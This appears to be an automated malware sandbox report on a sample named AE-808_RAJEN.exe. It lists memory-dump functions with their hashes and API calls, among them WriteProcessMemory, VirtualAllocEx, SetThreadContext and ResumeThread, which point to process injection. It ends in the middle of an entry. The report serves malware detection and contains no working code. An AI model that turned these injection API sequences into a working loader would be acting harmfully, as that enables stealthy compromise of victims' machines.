Instruction ID: 94e6a0990aa5ea4da95d1bfefcfb96503a4684217d7304c097e3bc3c277eec74
Opcode Fuzzy Hash: 5baaa3addc93870a3a8c59756a427e2a6f2538d31f51f1a40ca1b219d4716464
Instruction Fuzzy Hash: 37414AB6900258AFCF01CF99D884AEEBFF9EB49320F08805AE954A7210C7359954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06501B54, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 06501C2A

Memory Dump Source

Source File: 00000000.00000002.657708553.0000000006500000.00000040.00000001.sdmp, Offset: 06500000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c3c4b426977f60739c7c2f3955048342bea091f40364afcafe683d54010ed0ca
Instruction ID: 59534eb890a95c3c818782ff99fb4acafcefbe496da2d1f26c7568fac0807697
Opcode Fuzzy Hash: c3c4b426977f60739c7c2f3955048342bea091f40364afcafe683d54010ed0ca
Instruction Fuzzy Hash: 183136B0D106598FEB64CFE9C8857DEBBF1BB08314F10852AE815A7380EB749845CF96

Uniqueness

Uniqueness Score: -1.00%

Function 06501B60, Relevance: 1.6, APIs: 1, Instructions: 86libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 06501C2A

Memory Dump Source

Source File: 00000000.00000002.657708553.0000000006500000.00000040.00000001.sdmp, Offset: 06500000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0570a38d6d61503a3a0e12ef4da57f046bfdf4dd9264d51a11c2356a113b3d52
Instruction ID: e9bc23546490731199c84714a550066b9d0f719f3b6b4485b0c164ed2325f083
Opcode Fuzzy Hash: 0570a38d6d61503a3a0e12ef4da57f046bfdf4dd9264d51a11c2356a113b3d52
Instruction Fuzzy Hash: AE3117B0D106598FEB64CFE9C8857DEBBF1BB08314F148529E815A7380E7749845CF96

Uniqueness

Uniqueness Score: -1.00%

Function 05EB7FC0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05EB8050

Memory Dump Source

Source File: 00000000.00000002.657489829.0000000005EB0000.00000040.00000001.sdmp, Offset: 05EB0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b32e23f7715bf2acf261c44c738bb6f17854e6a5e08ee7cda6f47b5ab9ad179c
Instruction ID: fead07d487151d5b4122198c7e1eceab0a56d64978a2ef93045f1072e0748d71
Opcode Fuzzy Hash: b32e23f7715bf2acf261c44c738bb6f17854e6a5e08ee7cda6f47b5ab9ad179c
Instruction Fuzzy Hash: A22126B19043499FDB10CFA9C884BDEBBF5FF48314F00842AE959A7340C7B89954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A56754, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A56D86,?,?,?,?,?), ref: 02A56E47

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ed226758e9e1f5d2db413a61e16915f88cef2fd595be3b12731bc3db58a48cd6
Instruction ID: fb72b00e30c994cb95140c52b7da8b49c7aa71c2aacdacb6b7dee08a0e0a83ff
Opcode Fuzzy Hash: ed226758e9e1f5d2db413a61e16915f88cef2fd595be3b12731bc3db58a48cd6
Instruction Fuzzy Hash: 9C21E6B5901258DFDB10CFAAD884BDEBBF8FB48324F14841AE914A3310D774A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02A56DB8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A56D86,?,?,?,?,?), ref: 02A56E47

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b9a9329dd07d164199f3ccc3dee68bf3487dbfa35c2c441c899938cecac16a8e
Instruction ID: afb29f1379fec530933b44254210f5b7046c50e0ba8974098a8b9ad10ea92c5d
Opcode Fuzzy Hash: b9a9329dd07d164199f3ccc3dee68bf3487dbfa35c2c441c899938cecac16a8e
Instruction Fuzzy Hash: F221E3B59012189FDB10CFAAD984ADEBBF8FB48324F14841AE914A3310D374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05EB80B0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05EB8130

Memory Dump Source

Source File: 00000000.00000002.657489829.0000000005EB0000.00000040.00000001.sdmp, Offset: 05EB0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5fa0f66941cd236e42514381ad6fd4d8db68e644c711b79864cfc99dc6f7646e
Instruction ID: 50226f1b9149122ce62e74817193311966c80f6def21bed9597947e1875b8f38
Opcode Fuzzy Hash: 5fa0f66941cd236e42514381ad6fd4d8db68e644c711b79864cfc99dc6f7646e
Instruction Fuzzy Hash: 5B2114B18003499FDB10CFAAC884AEEBBB5FF48314F50842AE959A7240C7789954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05EB7E28, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 05EB7EA6

Memory Dump Source

Source File: 00000000.00000002.657489829.0000000005EB0000.00000040.00000001.sdmp, Offset: 05EB0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 573a682daf2f495aa36d2a717fc6d808d96c3db6777006c6c2a78e80a826fd91
Instruction ID: 483ed4bc469fe0b478a1a00b271c78e88836ae17f2a1a6086e5b047cf1586ada
Opcode Fuzzy Hash: 573a682daf2f495aa36d2a717fc6d808d96c3db6777006c6c2a78e80a826fd91
Instruction Fuzzy Hash: 4F2107719042098FDB14DFAAC4847EFBBF5EF88214F14842ED559A7640DB78A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A5B100, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A5BE89,00000800,00000000,00000000), ref: 02A5C09A

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 42ea95c6044a7c12d46c57862bc34546c0134290d6efcfb3cc6bbdac8f1fd128
Instruction ID: b33e38051d1bc1fe41c00454f05610cf8dd2e49ba2d909e524108ea50b4c577e
Opcode Fuzzy Hash: 42ea95c6044a7c12d46c57862bc34546c0134290d6efcfb3cc6bbdac8f1fd128
Instruction Fuzzy Hash: 1A1103B69003198FDB20CF9AD484B9FFBF5AB88324F00842AD915A7200C775A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05EB7F00, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05EB7F6E

Memory Dump Source

Source File: 00000000.00000002.657489829.0000000005EB0000.00000040.00000001.sdmp, Offset: 05EB0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 92f82439aa83cdd8d6e697398f7cf47b32829d4ffb95164c45cc045b10d97f3c
Instruction ID: 6980193f70514c53b2f7ce2f1f9f9d3cd060287da7001cecf3cd9d45e3b7a7a2
Opcode Fuzzy Hash: 92f82439aa83cdd8d6e697398f7cf47b32829d4ffb95164c45cc045b10d97f3c
Instruction Fuzzy Hash: 5F1134729042489FDF10CFAAC844BEFBBF5EF88324F14842AE565A7250C775A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A5C028, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A5BE89,00000800,00000000,00000000), ref: 02A5C09A

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a4df3baa6548b74af83267d3f5346ab25db55b74dcbb8c883ba6bafe0dd3c2f5
Instruction ID: 40992ee4da4aee1df1809ffb80df7afd29572871505fe803fc6d7660ddd7c59e
Opcode Fuzzy Hash: a4df3baa6548b74af83267d3f5346ab25db55b74dcbb8c883ba6bafe0dd3c2f5
Instruction Fuzzy Hash: 6D1100B6D002198FDB10CF9AC584BDEFBF4AF48324F15852AD819A7600C779A949CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A5B0AC, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02A5BBDB), ref: 02A5BE0E

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b7bda4c8b71dc3866b5df3ced25c6b5fc3e3aca7885fbb0c997633b2d47c515a
Instruction ID: 423e451cceff4902d6c73397bd7b59b0187a8d0235fee5aa6e6f41d3188e414f
Opcode Fuzzy Hash: b7bda4c8b71dc3866b5df3ced25c6b5fc3e3aca7885fbb0c997633b2d47c515a
Instruction Fuzzy Hash: AC11F3B59002598FDB10CF9AC484B9FFBF4EB88228F14845AD919A7200C774A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05EB7D78, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05EB7DDA

Memory Dump Source

Source File: 00000000.00000002.657489829.0000000005EB0000.00000040.00000001.sdmp, Offset: 05EB0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 63e74e3b25735e7d50a6318616e0af16f3fb33c1f9e30c15cd0cf780885ef81d
Instruction ID: 7b541cbb801e5e7d5444594fd1662d59bf5b2fddb08adf17dbe42162d1adc5bd
Opcode Fuzzy Hash: 63e74e3b25735e7d50a6318616e0af16f3fb33c1f9e30c15cd0cf780885ef81d
Instruction Fuzzy Hash: 001136B19042488FDB10DFAAC8447EFFBF4EB88228F14842AC559A7740CB74A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A5B274, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,02A5DEA8,?,?,?,?), ref: 02A5DF1D

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 40fb0d6300fb07585aa7c43385daa653394a9190d1c2db2c6a9d1a2f10d38ca0
Instruction ID: d0627c6fa41b817528e63b799f95ad26e01f3f7628e86dcc93a0ab29c5b2a757
Opcode Fuzzy Hash: 40fb0d6300fb07585aa7c43385daa653394a9190d1c2db2c6a9d1a2f10d38ca0
Instruction Fuzzy Hash: D41103B5900619DFDB20CF99D488BDFBBF8EB48324F10845AE915A7300C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06506A94, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06509FD5

Memory Dump Source

Source File: 00000000.00000002.657708553.0000000006500000.00000040.00000001.sdmp, Offset: 06500000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 559167978715a06eb2ab2881a9d27143e4d50912a4693b372181637961200244
Instruction ID: a18c50540a2f03f4fbe61e8808daccb4bbecaca0f52a07192470f85a85ff7c0a
Opcode Fuzzy Hash: 559167978715a06eb2ab2881a9d27143e4d50912a4693b372181637961200244
Instruction Fuzzy Hash: 9F11F5B58002489FDB20CF99C888BDEBBF8FB48324F108419E515A7240C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06509F73, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06509FD5

Memory Dump Source

Source File: 00000000.00000002.657708553.0000000006500000.00000040.00000001.sdmp, Offset: 06500000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e67df2304620ff60ea70b07cafad1fb0b6aa914bb46122ba3d819723ddbfae95
Instruction ID: 4712c9aa4c39bcb41a812eaf5583a98558f4c2de892fc9c572b154dc72be63e1
Opcode Fuzzy Hash: e67df2304620ff60ea70b07cafad1fb0b6aa914bb46122ba3d819723ddbfae95
Instruction Fuzzy Hash: AF11D3B58003499FDB10DF9AC885BDFBBF8FB48324F14841AE554A7640C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A5DEB9, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,02A5DEA8,?,?,?,?), ref: 02A5DF1D

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: ce8530e14261aac87e63fc4e8922e8dbb25ddbebe0a0d96fd05506569908a936
Instruction ID: 612831ea076d8ff7f34b2200edb4132add9af617e536aee9945a1e0e09cb7626
Opcode Fuzzy Hash: ce8530e14261aac87e63fc4e8922e8dbb25ddbebe0a0d96fd05506569908a936
Instruction Fuzzy Hash: B711F2B5900208CFDB10CF99D584BDFBBF8EB48324F14841AD919A7600C374AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0104D4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.654187284.000000000104D000.00000040.00000001.sdmp, Offset: 0104D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee9035b65b4b5c9e2b910a91a38473330a48a27f01c4374b71cdd4327375a77
Instruction ID: 838698ab82b72fe87896a8226dca255514f4b0dcd29aa24fa2f254826e4372b5
Opcode Fuzzy Hash: bee9035b65b4b5c9e2b910a91a38473330a48a27f01c4374b71cdd4327375a77
Instruction Fuzzy Hash: 472125F1504204DFDB05CF94D9C0B2ABBA5FB98328F2485BDE9494B206C736D856CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0105D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.654227155.000000000105D000.00000040.00000001.sdmp, Offset: 0105D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d7566aaf1182f219732f89ebe241925607c8c30c69ffc2980a99f5eb76a2ec0
Instruction ID: 0ec1f1c3bb2669629921d68ee110e19037c03437048ce6c384578a6015e9aa18
Opcode Fuzzy Hash: 0d7566aaf1182f219732f89ebe241925607c8c30c69ffc2980a99f5eb76a2ec0
Instruction Fuzzy Hash: B72103B1504204DFDB55CF54D5C0B17BBA5EB84254F20C9AAED894B246C33AD807CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0105D006, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.654227155.000000000105D000.00000040.00000001.sdmp, Offset: 0105D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5386bd62962361b10f02e05dd4add91bd717d09e63cddc7bc5e846ed751136f9
Instruction ID: 177b2bd494b42f46c83d66f32103e87d1410535b0693c8bf4368a41bea02fe21
Opcode Fuzzy Hash: 5386bd62962361b10f02e05dd4add91bd717d09e63cddc7bc5e846ed751136f9
Instruction Fuzzy Hash: 3C21C2754083808FCB52CF24C990715BFB1EB46214F28C5DBD8888B297C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0104D4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.654187284.000000000104D000.00000040.00000001.sdmp, Offset: 0104D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2330691ba4d7911e2eb2ecb7cf07cc4824dc234649578f840251faf07cc16324
Instruction ID: 722c6045954abf963b9e01651b31163b02a2be7e59f2608ffae7409a1a01bd5e
Opcode Fuzzy Hash: 2330691ba4d7911e2eb2ecb7cf07cc4824dc234649578f840251faf07cc16324
Instruction Fuzzy Hash: 7A11B1B6404280CFCB12CF54D5C4B16BFB1FB98324F2486A9D8454B656C33AD456CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0104D749, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.654187284.000000000104D000.00000040.00000001.sdmp, Offset: 0104D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d49d0645e00d1b13fb07e745b7b703f9b7546b9c6ab1b1d82d02a027c8b37e6
Instruction ID: abc774453a28cfc711b8eabd39196091ce19912bb43b4b77d71b3fd9243b98be
Opcode Fuzzy Hash: 7d49d0645e00d1b13fb07e745b7b703f9b7546b9c6ab1b1d82d02a027c8b37e6
Instruction Fuzzy Hash: 570184A14083849BE761DB95CCC4B6ABBD8FF51264F08C5AAEE445A247E378A844C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0104D748, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.654187284.000000000104D000.00000040.00000001.sdmp, Offset: 0104D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c9c81812275c53bdabc66d7038329dee9e4b0c4bb1790185025531f5ee0b4ca
Instruction ID: 5e21df5688dda603174cf34289c0b40efc7b8d85d2ade2742e11abc30a2bd86a
Opcode Fuzzy Hash: 6c9c81812275c53bdabc66d7038329dee9e4b0c4bb1790185025531f5ee0b4ca
Instruction Fuzzy Hash: C7F0C8714042849FEB518B45CCC4B62FFD8EB41634F18C05AED440B347D374A844CBB0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05EB0040, Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

), xrefs: 05EB199C

Memory Dump Source

Source File: 00000000.00000002.657489829.0000000005EB0000.00000040.00000001.sdmp, Offset: 05EB0000, based on PE: false

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: edce48da7ae6d3dbbdf2c0d25c2a967438bd5fff7d99c3328f8268be00d791d6
Instruction ID: 3fbe29d6fe9f1a4708e1c8eb9ae28e3971995dbfb11acbd7e5493d8c741261ce
Opcode Fuzzy Hash: edce48da7ae6d3dbbdf2c0d25c2a967438bd5fff7d99c3328f8268be00d791d6
Instruction Fuzzy Hash: DF4141B1E056588BFB1CCF67CC4079AFAF7AFC9204F18C1BA854DAA215EB7049858F15

Uniqueness

Uniqueness Score: -1.00%

Function 02A5C2B0, Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3730691b4d02b6044ef8ff820d874d7ae1409a2a48e493296aba5f18da66a4
Instruction ID: 5699a073f2c7396363d412d0d859cd53e368bff67cde2010a63a37fb4c237e31
Opcode Fuzzy Hash: 8a3730691b4d02b6044ef8ff820d874d7ae1409a2a48e493296aba5f18da66a4
Instruction Fuzzy Hash: A45227B1520B068BE710CF14EC8A69EBFF1FB45328F918219E5615BA90DBBC654BCF44

Uniqueness

Uniqueness Score: -1.00%

Function 02A599B8, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b3d1591a2daecef63a8aeee3df63afd8fd40a41ab59f3410a62e3a01331ea51
Instruction ID: bda0afb899ad30d568611a9e2c7fbfec198f5e4e273027498d619eea40add3cb
Opcode Fuzzy Hash: 7b3d1591a2daecef63a8aeee3df63afd8fd40a41ab59f3410a62e3a01331ea51
Instruction Fuzzy Hash: 16A1A232E002298FCF05CFA5C9845DEBBB2FF85305B15856AE905BB225EF35A905CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06503E38, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657708553.0000000006500000.00000040.00000001.sdmp, Offset: 06500000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19cd0ac77cbc0dd96080b441078a9f0101b38c423c4971d72892f67acc668613
Instruction ID: 70da91cb449884dfe2efe099588b0f3d92ce025e115c6db11d4caa03bfc48955
Opcode Fuzzy Hash: 19cd0ac77cbc0dd96080b441078a9f0101b38c423c4971d72892f67acc668613
Instruction Fuzzy Hash: 36915770E04209DFEB50CFA9C9817EEBBF2BF88314F148129E815AB294DB749845CF81

Uniqueness

Uniqueness Score: -1.00%

Function 05EB0006, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657489829.0000000005EB0000.00000040.00000001.sdmp, Offset: 05EB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f74c0934eeb4a325e1beecde44a21cdea5128bbb032b6b3a85c43ac015fcffd7
Instruction ID: 761cf48ce52aad15b785cfa416e2a65ebb8e0de0a5923212e276930e7a16f8de
Opcode Fuzzy Hash: f74c0934eeb4a325e1beecde44a21cdea5128bbb032b6b3a85c43ac015fcffd7
Instruction Fuzzy Hash: AF4195B1E057548BEB1DCF678C4128AFAF7AFC9200F08C1FA854CAA265EB7009458F15

Uniqueness

Uniqueness Score: -1.00%

Function 05EB001C, Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657489829.0000000005EB0000.00000040.00000001.sdmp, Offset: 05EB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 576a221f6db86b23dfbc4274a4d132ffd120ec1bcb1a0ec1984881724d145bbd
Instruction ID: d5a83c8d69f19f8934352a954e96bcf6cb768e52366c444948bcba590ea92159
Opcode Fuzzy Hash: 576a221f6db86b23dfbc4274a4d132ffd120ec1bcb1a0ec1984881724d145bbd
Instruction Fuzzy Hash: 574176B1D056588BFB1CCF678C4569EFAF3AFC9200F18C5BA854CAA269EB7005858F15

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AE-808_RAJEN.exe PID: 2912 Parent PID: 6140 AE-808_RAJEN.exeCOMMON

Executed Functions

Function 0144DF28, Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1031029539.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a0267ac56fec4d2dfd499ce8ff45fc2148bd0dc2c99226e952e38eca6bef5d
Instruction ID: 90cb0a6bea9fa1d82ef8a9008c35f6fad9787156c56c6b70d420347a44f33ece
Opcode Fuzzy Hash: 10a0267ac56fec4d2dfd499ce8ff45fc2148bd0dc2c99226e952e38eca6bef5d
Instruction Fuzzy Hash: 61F14D30A00209CFEB14DFA9C894B9EBBF1BF88314F15C56AD505AF3A5DB78A945CB41

Uniqueness

Uniqueness Score: -1.00%

Function 064D54E4, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 064DB21B

Memory Dump Source

Source File: 00000001.00000002.1034051713.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 302963ce4816eeab4f66265411345cc3c461c024ae9c9a801abd79f89611cc8a
Instruction ID: 30472bf118bbd4135626c6fe1a9e79e976a051c90957136067eeed2a8a16bee3
Opcode Fuzzy Hash: 302963ce4816eeab4f66265411345cc3c461c024ae9c9a801abd79f89611cc8a
Instruction Fuzzy Hash: D35134B1D002188FDB14CFA9C899BDEBBB1FF48314F15812AE815AB391D774A845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 017B6B1F, Relevance: 6.1, APIs: 4, Instructions: 149threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 017B6BB0
GetCurrentThread.KERNEL32 ref: 017B6BED
GetCurrentProcess.KERNEL32 ref: 017B6C2A
GetCurrentThreadId.KERNEL32 ref: 017B6C83

Memory Dump Source

Source File: 00000001.00000002.1031726258.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a4c748f4b86b8088bbce1b1e238f2d772980f5c6de79c92a678dc94bbda4ac5e
Instruction ID: b55bb57f9f34f78526faca221a37d20e0f3095b029c66a95e762842d6e6e2df7
Opcode Fuzzy Hash: a4c748f4b86b8088bbce1b1e238f2d772980f5c6de79c92a678dc94bbda4ac5e
Instruction Fuzzy Hash: E5619CB09053889FDB15CFA9D9887DEBFF0EF49314F14809AE544AB261D7745844CF62

Uniqueness

Uniqueness Score: -1.00%

Function 017B6B50, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 017B6BB0
GetCurrentThread.KERNEL32 ref: 017B6BED
GetCurrentProcess.KERNEL32 ref: 017B6C2A
GetCurrentThreadId.KERNEL32 ref: 017B6C83

Memory Dump Source

Source File: 00000001.00000002.1031726258.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 56e7f53f830217f75510d9c6091c82748a0964df73801a757d7189ec2f214f2e
Instruction ID: 59aa7f7d37e690c982ed9350592525f6cc8884f98a3ae8392253f42adca3e269
Opcode Fuzzy Hash: 56e7f53f830217f75510d9c6091c82748a0964df73801a757d7189ec2f214f2e
Instruction Fuzzy Hash: AA5124B49102499FDB24CFAAD988BDEFBF1FB88314F208069E519A7350D7746884CF65

Uniqueness

Uniqueness Score: -1.00%

Function 014402B0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetWindowInfo.USER32 ref: 014403D8

Strings

<*l, xrefs: 014402E3

Memory Dump Source

Source File: 00000001.00000002.1031029539.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: false

Similarity

API ID: InfoWindow
String ID: <*l
API String ID: 1131730514-2271776141
Opcode ID: b4651d09108432e5230b8d7c07a34f1ed0cb105193d28da1efd6fdf6ebae324d
Instruction ID: fd603b6dc5eea6bb96e19d8a4a9be64a94c772ec771249d521753617e44475f9
Opcode Fuzzy Hash: b4651d09108432e5230b8d7c07a34f1ed0cb105193d28da1efd6fdf6ebae324d
Instruction Fuzzy Hash: E8610830B002048FDB55AB79D4582AEBBF2EF89211F15847EE619DB3A1DF348C55C791

Uniqueness

Uniqueness Score: -1.00%

Function 064D8E34, Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 064DB21B

Memory Dump Source

Source File: 00000001.00000002.1034051713.00000000064D0000.00000040.00000001.sdmp, Offset: 064D0000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 2ed345e1bb3c6b804bfba918c920eceec9ef4ee340cad33c7ed6fd8c25daf063
Instruction ID: d20e2ac621538eee3ee17ff2e53f69762e02cf5e708b33e12a5cf013693abf2e
Opcode Fuzzy Hash: 2ed345e1bb3c6b804bfba918c920eceec9ef4ee340cad33c7ed6fd8c25daf063
Instruction Fuzzy Hash: C45134B1D002188FDB18CFA9C899BDEBBB1FF48314F15812AE815AB391D774A845CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01440768, Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1031029539.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9afd6cb3f702084eaacd40d2fd45d9cccce60c6224bd0d30326f3def1b75bf73
Instruction ID: 13316005fee16972dd57906275dba27ff89261055d5ba5281681c7bb1502560a
Opcode Fuzzy Hash: 9afd6cb3f702084eaacd40d2fd45d9cccce60c6224bd0d30326f3def1b75bf73
Instruction Fuzzy Hash: A2412271D043598FDB00CFA9C8046AEFBF1AF89210F05856FD548AB351DB349845CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 017B5184, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017B52A2

Memory Dump Source

Source File: 00000001.00000002.1031726258.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false

Similarity

API ID: CreateWindow
